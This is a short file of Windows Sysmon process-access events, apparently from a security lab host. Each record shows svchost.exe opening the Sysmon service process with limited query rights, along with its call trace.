{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
